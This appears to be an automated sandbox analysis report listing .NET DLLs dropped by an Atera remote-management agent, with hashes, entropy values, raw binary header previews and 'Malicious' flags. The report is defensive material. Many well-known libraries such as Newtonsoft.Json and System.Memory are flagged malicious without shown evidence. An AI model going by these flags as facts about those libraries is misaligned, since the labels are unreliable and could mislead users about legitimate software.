                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...p;_f.........." ..0..B..........Na... ........... ....................................@..................................`..S....................J..((........................................................... ............... ..H............text...TA... ...B.................. ..`.rsrc................D..............@..@.reloc...............H..............@..B................0a......H....... 3...-.........../.......2.........................................}.....(......}.......(..... ....(..... ....(.....(....o....*"..(....*..(....*...(.....{....,..+..+.-..{.....o....o....*...0..?.........+..o....,..+..+.-..o....o....,..+..+.-..*.o......,..+..+.-..*..0..J.........(.....(....,..+..+.-2.{.....3#.{....,..+..+.-....s....}.....(.....(....*j....$...s..........(....&*z.{....,..+..+.-..(......(....*..{....*.0...........{.....;.....(....,..+..+.-...}....*.{....,.

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\EO.WebBrowser.dll

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):219176
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.062824781472667
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:6144:nYq80gPJle2CpcKyudA1+PVtMG8e7sw9CcHvhlt:nYqqbe2CSod5dtM8ww7PB
                                                                                                                                                                                                                                                                                              MD5:9D744C31089704B1130E09E63B0A77EF
                                                                                                                                                                                                                                                                                              SHA1:5EFBE59068AD3C09B29565F5A117347F5B85D0EA
                                                                                                                                                                                                                                                                                              SHA-256:D9B9EFAF5C6B1D3EB726EEE5B6FE1517B4693C4E79BD9D36D3D9FB4F56E01E1D
                                                                                                                                                                                                                                                                                              SHA-512:E4456196C56B43ABA2A804694B6177A6EB78D035BD1AD9A0163BCFDDD6FCF75C34AF08C849A8086B78347141C798A050FD33BD02CFAA1BCF679ECB928737D3A4
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...j;_f.........." ..0..(...........F... ........... ....................................@.................................dF..W....`...............0..((........................................................... ............... ..H............text....&... ...(.................. ..`.rsrc........`.......*..............@..@.reloc..............................@..B.................F......H........S.......................S.......................................r...p(................s.........*...0...........o.....=3A.o......o......,..+..+.-.....o......(F.....,..+..+.:B......oK...*.o.... 7...@........o.......o.....o.....o........(F.......,..+..+.:t.....{f...,..+..+.-......-\.o........([.......~....(....,..+..+.-5.o........oF........ob.......,..+..+.-.....}f.....&......o.......o....*.o.....\3%.o.......o.......t......(......o....*.o.....]33.o.........1&.o........

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\FormControlsLibrary.dll

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):302120
                                                                                                                                                                                                                                                                                              Entropy (8bit):7.175844791268153
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:6144:9tDIk5C5mx115y505H0jIfJMSFk9X0jIfJMSFk9y:fGwJMykwwJMyky
                                                                                                                                                                                                                                                                                              MD5:24E35FC5F23B651ED4C828208990F6B8
                                                                                                                                                                                                                                                                                              SHA1:F7E295866E30105C0E9071B00A77EEC79F60B699
                                                                                                                                                                                                                                                                                              SHA-256:CA054D78E0B23D9EE4C0E42C8F12AE9065D3D0DB4FBD5A535CA2E61FE8FF7D93
                                                                                                                                                                                                                                                                                              SHA-512:E5F8905116BFFDDC60ADE11ABA3733F52BE6FAEA7C1AA57361BC9A395D770D478A1D90D729A94A39171F7D8EF5CF25F45EDF70470A3ECD6AF8C0DC27F1AE3078
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...<.N..........." ..0..l............... ........... ....................................`................................._...O....................t..((..............8............................................ ............... ..H............text....k... ...l.................. ..`.rsrc................n..............@..@.reloc...............r..............@..B........................H.......@W.. u..........`...X...........................................V.(......}......}....*..,..{.(..........,..p .@..(................s....(....*.~.......~....(....~.......~....(....*..0..........~.....(.....{.....{...+..(......{.....{3.~.....3..{.....p3.s>...s....%.o ...%.o!...(6...*.{.....{3"r...p.{.....{.....r...p.("...(#...*...0..$.......s$....o%...(&...o'...((......&.....*.................0..Q.......r...p.().....,..(*...-....4r...p.().....-.r...p..q...(+.....q.....(*

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\FormControlsLibrary.dll.config

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):432
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.0141792226861375
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:12:MMHdGzNFF7ap+5v5OXrRf/2//FicYo4xT:JduPF7NhOXrRH2/d9y
                                                                                                                                                                                                                                                                                              MD5:8F6EB9E75E6A6F0C0D58FB697C10CEDF
                                                                                                                                                                                                                                                                                              SHA1:6944935DFDC33E0C6DB26869BF25EDA85A2622D8
                                                                                                                                                                                                                                                                                              SHA-256:E2B8677434501735FB0233ED0CC2FFEE5BF6FB4387C51DBCB2585A70E42E4F08
                                                                                                                                                                                                                                                                                              SHA-512:A946252B2E3705EAE751A2672D4ADE1499ECEB28C48B4BE6150C4201EE20A7B9A4450C75E06B07F5DAA3528041A566931D988FBD0C2EA90240D61008895BA44A
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:.<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <runtime>.. <assemblyBinding xmlns="urn:schemas-microsoft-com:asm.v1">.. <dependentAssembly>.. <assemblyIdentity name="Newtonsoft.Json" publicKeyToken="30ad4fe6b2a6aeed" culture="neutral" />.. <bindingRedirect oldVersion="0.0.0.0-13.0.0.0" newVersion="13.0.0.0" />.. </dependentAssembly>.. </assemblyBinding>.. </runtime>..</configuration>

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\ICSharpCode.SharpZipLib.dll

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):215080
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.030238846720031
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:6144:Z1uYsjrFIzmuxpOI/1MvCdRbpSISC8j7sw:AIzm6pOIgvr7p
                                                                                                                                                                                                                                                                                              MD5:F4E5A12570C546887839144E366482A8
                                                                                                                                                                                                                                                                                              SHA1:44462E129DD9DDF05623BBE3437FE64821F14787
                                                                                                                                                                                                                                                                                              SHA-256:3CA6DCCBC420E9100F3BC9B3BDBEA6973816C62B8DC2A81FF22F6E842C10DD35
                                                                                                                                                                                                                                                                                              SHA-512:8AD5A8B20B3EA96BB5044543D4556AEC224BF343023EB4C5CDD605EC8CA5A7E9BE329E71D9421268CD7FD4B0CA476C102AE0E4F6AE002363B15888D7DAA9E7B3
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....*............" ..0..............'... ...@....... ....................................`..................................'..O....@..t............ ..((...`.......&..T............................................ ............... ..H............text........ ...................... ..`.rsrc...t....@......................@..@.reloc.......`......................@..B.................'......H........... ...................$&........................................( ...*"..(!...*&...("...*&...(#...*2.r...p(....*"..(....*&...(....*&...(....*2.rE..p(....*"..(....*&...(....*&...(....*2.r...p(....*"..(....*&...(....*&...(....*J..r...p($...(....*v....(%.....(%.....(%...(....*....L...%...%.r...p.%...%.r...p.%....%.r+..p.%...(&...(....*..(....*&...(....*&...(....*.0..)........{.........('...t......|......(...+...3.*....0..)........{.........()...t......|......(...+...3.

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\Microsoft.ApplicationInsights.dll

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):398888
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.1341588755904635
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:6144:ZjS6t1sm5LldNolZIkImcTi077Keb0wi0Lcr4so8mysKTqRjMnM6/Zmvnt:Z+e55LgIkTmyAAfTnMLvnt
                                                                                                                                                                                                                                                                                              MD5:0F550F1F92AA94E930A6C68D805699C7
                                                                                                                                                                                                                                                                                              SHA1:BFDAAE802A1479E01C0FB5165B7ECC951F82117F
                                                                                                                                                                                                                                                                                              SHA-256:9DD7542BEFEDA3649F61AFAB2D82C1D8B26115F41E864A2F8264E709FC91812D
                                                                                                                                                                                                                                                                                              SHA-512:5567706E01652BF7C7F56FA3FA49547D130CDE23AEE116E706F2868079011C5B263E5CC604B5662E1090B7AB2ABC205024DAAE484C836D6882E7464FBDA85E06
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................." ..0.................. ... ....... .......................`............`.................................v...O.... ..................((...@..........8............................................ ............... ..H............text........ ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B........................H...........P...................$.........................................{)...*..{*...*V.(+.....}).....}*...*...0..;........u......,/(,....{)....{)...o-...,.(.....{*....{*...o/...*.*. S]G. )UU.Z(,....{)...o0...X )UU.Z(.....{*...o1...X*.0...........r...p......%..{)....................-.q.............-.&.+.......o2....%..{*....................-.q.............-.&.+.......o2....(3...*..{4...*..{5...*..{6...*..{7...*..(+.....}4.....}5.....}6......}7...*....0..k........u......,_(,

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\Newtonsoft.Json.dll

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):710184
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.960676959152574
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:12288:NBja5bBvR8Q0TE2HB0WLmvXbsVG1Gw03RzxNHgKhwFBkjSHXP36RMGy1NqTUgA:NBjk38WuBcAbwoA/BkjSHXP36RMGJA
                                                                                                                                                                                                                                                                                              MD5:E9108FCACB095ED2823F69BAA9ED1D93
                                                                                                                                                                                                                                                                                              SHA1:EE25D1E059F0CE1ADDD5E4B7A03853B36C884400
                                                                                                                                                                                                                                                                                              SHA-256:0BA7E4BEDA6C8C7A6B877FC2B7E0B6F8A8F507658FCA54A912F8E45554C182D6
                                                                                                                                                                                                                                                                                              SHA-512:21AED55252C9274266EB2CAF51D5B92762071E0B332CC5DDE7CC32C1782FA81B1140BD0F635016C6FEC0C4A172109825CF6E5EE5A93C6F0B1863CDCEE053AA4F
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...p$?..........." ..0.............B.... ........... ....................... ......./....`....................................O.......................((.......... ...T............................................ ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B................$.......H.......x...(9............................................................(....*..(....*^.(...........%...}....*:.(......}....*:.(......}....*..(....*:.(......}....*..{....*..(....*..(....*:.(......}....*..{....*.(.........*....}.....(......{.....X.....}....*..0...........-.~....*.~....X....b...aX...X...X..+....b....aX....X.....2.....cY.....cY....cY..|....(......._..{........+,..{|....3...{{......(....,...{{...*..{}.......-..*...0...........-.r...ps....z.o......-.~....*.~....

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\QRCoder.dll

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):154664
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.990887534367274
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:3072:s4wM6OoRu7qywKsqxhDuPr5xJMnOfMAw3TkHjt0QQNOWIkHUsz72otHA3Qe:s4wZywKn/U5xEwKIk0W1e
                                                                                                                                                                                                                                                                                              MD5:82B94D333BAF35B94599C989A1A8EECA
                                                                                                                                                                                                                                                                                              SHA1:5DF13E96606E67B4D5275D3BB91B9A95AFD31617
                                                                                                                                                                                                                                                                                              SHA-256:BB8180CBDF1CDC7E7EBC4D23DAE6224F05145EA2605BF76D18D49983F4756E04
                                                                                                                                                                                                                                                                                              SHA-512:1EBBAC94643FC4D3A74230A006478F1D7DD6A8BA8F8608D7B69DE5C92E9BD3182CDB4183345C73B48B3752D04C060CE42ADB7E3A8C1A9424ED47364E4FE837E7
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...}.b..........." ..0..*..........6&... ...`....... ....................................@..................................%..O....`...............4..((...........%..T............................................ ............... ..H............text....)... ...*.................. ..`.rsrc........`.......,..............@..@.reloc...............2..............@..B.................&......H............D...................$........................................{....*..{....*V.(......}......}....*...0..A........u........4.,/(.....{.....{....o....,.(.....{.....{....o....*.*.*. R..0 )UU.Z(.....{....o....X )UU.Z(.....{....o....X*...0..b........r...p......%..{.......%q.........-.&.+.......o ....%..{.......%q.........-.&.+.......o ....(!...*..{....*"..}....*..(....*:.(......(....*"..(....*f.(....%-.&+.(b.....(....*..(....*"..(....*...0..%.........("...(#...($....#.

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\System.Buffers.dll

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):22056
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.669568565502546
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:384:JrMdp9yXOfPfAxR5zwWvYW8aznNyb8E9VF6IYijSJIVxAPc:JrMcXP64LEpYi60F
                                                                                                                                                                                                                                                                                              MD5:E5E7EB1598B17C8373BC0F0C5F937840
                                                                                                                                                                                                                                                                                              SHA1:469D0F5A911EF1C80FC0E328F9E76A34583BB31D
                                                                                                                                                                                                                                                                                              SHA-256:B883AFE3544A92BD429BBA8057F7C4AEAD683739E91F2CCA8F8147FE3327428B
                                                                                                                                                                                                                                                                                              SHA-512:B2971B3D64578564F9A9DEC3616F85570C81AF65C596BA94A21578611C0DD3A834F5964636C4A10264D4A29B2EC2C74BED768DB4992CA2A43313025641BA932D
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....jM^.........." ..0..$..........BC... ...`....... ...............................L....@..................................B..O....`..@...............((...........A............................................... ............... ..H............text...H#... ...$.................. ..`.rsrc...@....`.......&..............@..@.reloc...............,..............@..B................$C......H........'...............?..X...8A......................................j~....%-.&(....s....%.....*..*...0..$.........(.....o.......&...,....o....,..*.*..................,!(....,..r...p.(....(....*..(....*.*.(....,.r...p......%...%...(....*..(....*.(....,.r...p......%...%...%...(....*...(....*.(....,!r...p......%...%...%...%...(....*....(....*.~....*2r...p.(....*B.....(.........*R.....(...+%-.&(!...*^.....("....(...+&~....*.s$...*"..s%...*..(&...*.*....0......................

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\System.Data.SQLite.dll

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):420392
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.109465884923044
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:12288:q5douWvsWkOfjL/MEd6/7vfA8SCW1nFNFfcaFeFOFwcGF6cmFWc0FWc8cIcKcUFr:qpjblhW1L
                                                                                                                                                                                                                                                                                              MD5:EA5C50754B3A11BE9489EAB04AB81031
                                                                                                                                                                                                                                                                                              SHA1:A46386934C9D629956668F87740E4DA4147E07B7
                                                                                                                                                                                                                                                                                              SHA-256:08A76A996C91AB785E4142621CDC3254B47175EC3A33FC8C3513ED8DFF554958
                                                                                                                                                                                                                                                                                              SHA-512:AAA3B07127EEB6F2E058C6864248863D4BAA83CD4683791AB82C507E57EA2EEF6FD78C1FA29640CDF583EC12F8C13668F4D8DE79BF4387711D7EDBD28B826344
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....d.........." ..0..8...........T... ...`....... ..............................yT....`..................................T..O....`..p............B..((..........XS............................................... ............... ..H............text... 6... ...8.................. ..`.rsrc...p....`.......:..............@..@.reloc...............@..............@..B.................T......H........X..\V.................R......................................:.(;.....}....*..{....*:.(;.....}....*..{....*...0...........~<...}.....r...p}........(.....(.....(.....r)..p.(........(u.....~<...(=...,z.....s....}.......}.......}............{............%......(>....%...D....%...!....%...%.........%....%.........s....(B...*vra..p.(....,...}....*..}....*..{....*vr...p.(....,...}....*..}....*..{....*z.{....,......(>...o?...s@...z*.0..(........{....-..(......o....&....(j

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\System.Diagnostics.DiagnosticSource.dll

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):64040
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.266365839467569
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:768:PYDFPV3uv9niVSmzPFX8lpJ6TJPe4TW9Lvu2perEuaRtIvqUl1FHEpYi607zw:PKC9niwOepJ6TJPeb6NIUFg76Kzw
                                                                                                                                                                                                                                                                                              MD5:55DD167763EB9C4FE8709C21FDCFECD9
                                                                                                                                                                                                                                                                                              SHA1:A634B0897ED97161B62FF14B15B9AF9FBB760C7E
                                                                                                                                                                                                                                                                                              SHA-256:970011EE897E5BD415A4D70641B6ACC58F0656CB7F87E7C529B90640E1068C81
                                                                                                                                                                                                                                                                                              SHA-512:9F65B7AA10E046D0A64C67052DA8814BCE027239960B8768FF69922B90938299815A4D9D024CFABA296EC0EE2C9DC1FB2B6F8BAE9601235BB7BC34B6237C886F
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....[............" ..0.................. ........... .......................@...... .....`.................................k...O....... ...............((... ..........8............................................ ............... ..H............text........ ...................... ..`.rsrc... ...........................@..@.reloc....... ......................@..B........................H........[..h...........(.......0.........................................{#...*:.($.....}#...*..0..#........u......,.(%....{#....{#...o&...*.*v ..yN )UU.Z(%....{#...o'...X*....0..M........r...p......%..{#....................-.q.............-.&.+.......o(....()...*..{*...*:.($.....}*...*.0..#........u......,.(%....{*....{*...o&...*.*v ..:. )UU.Z(%....{*...o'...X*....0..M........r-..p......%..{*....................-.q.............-.&.+.......o(....()...*..{+...*..{,...*V.($...

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\System.Memory.dll

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):142376
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.160369825867044
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:3072:RUGrszKKLBFa9DvrJGeesIf3afNs2AldfIlqI:IBFd3/aFs2p
                                                                                                                                                                                                                                                                                              MD5:817FAA0EF87B090956DC66ABE717C2F8
                                                                                                                                                                                                                                                                                              SHA1:80C57CE1204908B0CD8BF696A9E54C55BF1C018B
                                                                                                                                                                                                                                                                                              SHA-256:0EC0A4222FFAD1F56182B48B6DC62906A3354912B52CB8B5974D5DA6D0AFFF2E
                                                                                                                                                                                                                                                                                              SHA-512:1B04F84E46D7C3894FE9437F3F1E35560FDA773D60413D5F607DE08409DAFBE241249145EC056871CA55B425E8CC39AD44F56F0D1D517149A902019902E7F6C5
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....jM^.........." ..0.................. ... ....... .......................`......u.....@.................................X...O.... ..0...............((...@...... ................................................ ............... ..H............text........ ...................... ..`.rsrc...0.... ......................@..@.reloc.......@......................@..B........................H........,................................................................('...*>..}......}....*..{....*..{....*..{.....{....3..{.....{....((...*.*..0...........%.u....,..........(....*.*z.{....%-.&.+.o)....{....(a...*..(....zN........o*...s+...*.(....z.s,...*..(....zF(U....(O...s-...*.(....z.(V...s-...*.(....z.s....*.(....z.s/...*..(....zN........o*...s0...*.(....zrr...p(\....c.K...(O...s1...*.(....zBr...p(Y...s1...*.(....z.s2...*.(....z.(X...s3...*.(!...z.(_...s3...*.(#...z

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\System.Numerics.Vectors.dll

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):110120
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.510600631729483
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:1536:kPOw0SUUKw+GbgjMV+fCY1UiiGZ6qetMXIAMZ2zstK/Yb76dH:kWw0SUUKBM8aOUiiGw7qa9tK/Yby
                                                                                                                                                                                                                                                                                              MD5:0325D05CE325053B86538BAE3677D036
                                                                                                                                                                                                                                                                                              SHA1:F6BD3CE0E63F1502FCA3568F9A2FE8EE610A02F3
                                                                                                                                                                                                                                                                                              SHA-256:E4A7BFBAB82F5632AF35A88392FD163F2B994FDF6898BE36166CF59D1DDDD32E
                                                                                                                                                                                                                                                                                              SHA-512:0E7ABF0C24153D4924733DD6A6B867C68439FF58DB0DCB09A11033CDF9D93317C06876971936A35244E0BD4A751356781BA23F7B9F8BBC82C3EE27ED9ED829B1
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....?.Z.........." ..0..v............... ........... ...................................@.................................f...O.......................((.......................................................... ............... ..H............text....u... ...v.................. ..`.rsrc................x..............@..@.reloc..............................@..B........................H........Q..|?..........$... ...D.........................................(....*&.l(....k*&.l(....k*..l.l(....k*..l.l(....k*&.l(....k*&.l(....k*&.l(....k*j~....%-.&(....s....%.....*..*.0..$.........(.....o.......&...,....o....,..*.*..................,!(....,..r...p.(....(....*..(....*.*.(....,.r...p......%...%...(....*..(....*.(....,.r...p......%...%...%...(....*...(....*.(....,!r...p......%...%...%...%...(....*....(....*.~....*2r...p.(....*2rG..p.(....*2r...p.(....*2r...p.(.

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\System.Runtime.CompilerServices.Unsafe.dll

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):17960
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.6730203845205205
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:384:gh06sbbVVPWU2WYNNyb8E9VF6IYijSJIVxeBZcyP:gy9gpEpYi60AZn
                                                                                                                                                                                                                                                                                              MD5:43D2A25330C937DBE092E763C728857F
                                                                                                                                                                                                                                                                                              SHA1:FACA5B0028E066D20DD60BFC381E64183BD1EAE9
                                                                                                                                                                                                                                                                                              SHA-256:7D38BCDD5A122941DA48F3B3464ED2BB2B3DE6AFCDAC951FBAFE827CA3A179D6
                                                                                                                                                                                                                                                                                              SHA-512:43A7F23EB47AB06C231447619E71764853C7F47AC13071A5F1237D477CD5AFF4DD413EE8F60BBD21C5D96E3DD29C494802E71FE69B836FF679449083BA6C6E0E
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....._...........!.................3... ...@....@.. ....................................@.................................@3..K....@..................((...`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................p3......H........$..0...................P ......................................._.%c......=.n')...(v..:}.d...3...B...).. .:Q(....L.jt....}Xv.b7y0r.[..$.....q..c.6.....p..2..qHv/.pb.=..9.o"z.. 0P.t%H....U...0...........q....*..0..............q....*...0..............q....*...0.................*.0....................*..0....................*..0............q.........*....0............q.........*....0............*..0..........*....0................*..0...............*...0..............

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\System.ValueTuple.dll

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
